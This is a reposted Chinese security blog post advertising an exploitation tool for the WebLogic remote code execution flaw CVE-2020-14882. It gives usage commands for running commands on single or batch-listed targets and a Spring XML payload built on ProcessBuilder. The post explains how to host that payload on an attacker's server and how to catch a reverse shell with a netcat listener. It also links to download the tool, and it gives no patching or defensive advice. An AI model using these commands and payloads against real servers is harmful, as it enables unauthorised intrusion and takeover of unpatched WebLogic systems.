Weblogic远程代码执行-CVE-2020-14882

admin 2020年11月3日21:05:53评论572 views字数 868阅读2分53秒阅读模式

CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。

需要模块:requests、http.client

Weblogic远程代码执行-CVE-2020-14882


功能一:命令回显

br

Weblogic远程代码执行-CVE-2020-14882


python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

Weblogic远程代码执行-CVE-2020-14882


功能二:批量命令回显

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"


target.txt 格式:http://x.x.x.x:xx,一行一个

Weblogic远程代码执行-CVE-2020-14882


功能三:外置xml文件无回显命令执行

1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">    <constructor-arg>      <list>  <value>cmd</value>      </list>    </constructor-arg>  </bean></beans>


开启python监听

Weblogic远程代码执行-CVE-2020-14882


nc开启监听

Weblogic远程代码执行-CVE-2020-14882


2、使用-x选项指定xml文件路径,发送payload。

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

Weblogic远程代码执行-CVE-2020-14882

3、成功接收shell

Weblogic远程代码执行-CVE-2020-14882


点击阅读原文下载工具

本文始发于微信公众号(安全微焦点):Weblogic远程代码执行-CVE-2020-14882

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月3日21:05:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic远程代码执行-CVE-2020-14882https://cn-sec.com/archives/177232.html

发表评论

匿名网友 填写信息